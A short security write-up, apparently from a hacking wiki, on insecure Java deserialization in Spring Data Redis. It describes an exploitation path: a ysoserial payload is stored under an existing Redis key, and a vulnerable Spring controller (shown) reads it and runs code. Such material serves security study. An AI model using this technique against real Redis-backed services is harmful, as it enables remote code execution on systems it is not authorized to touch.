Spring Data Redis Insecure Deserialization

Spring Data Redis overview

Spring Data Redis, part of the larger Spring Data family, provides easy configuration and access to Redis from Spring applications. Spring Data Redis first serializes data before writing data to Redis. By default, Java native serialization is used for serialization.

Insecure deserialization

When Spring Data Redis retrieves data from Redis, the stored bytecode is deserialized. Since the target class is not checked or filtered during deserialization it can lead to remote code execution.

Example of exploitation:

  1. Generate payload with ysoserial

  2. Write the generated payload in Redis:

    // Try to choose a key that already exists in Redis so that code execution can start when Spring retrieves data
    redis.set("\xac\xed\x00\x05t\x00\brebeyond", payload);
  3. Trigger or wait for Spring to retrieve data, example of vulnerable code:

    @Controller
    public class HelloController {
    
        protected RedisTemplate<Serializable, Serializable> redisTemplate;
    
        @GetMapping("/")
        public String index() {
            Object result = redisTemplate.opsForValue().get("rebeyond");
            return "index";
        }
    }
  4. Server starts calculator successfully:

    The call stack is as follows:

References

Last updated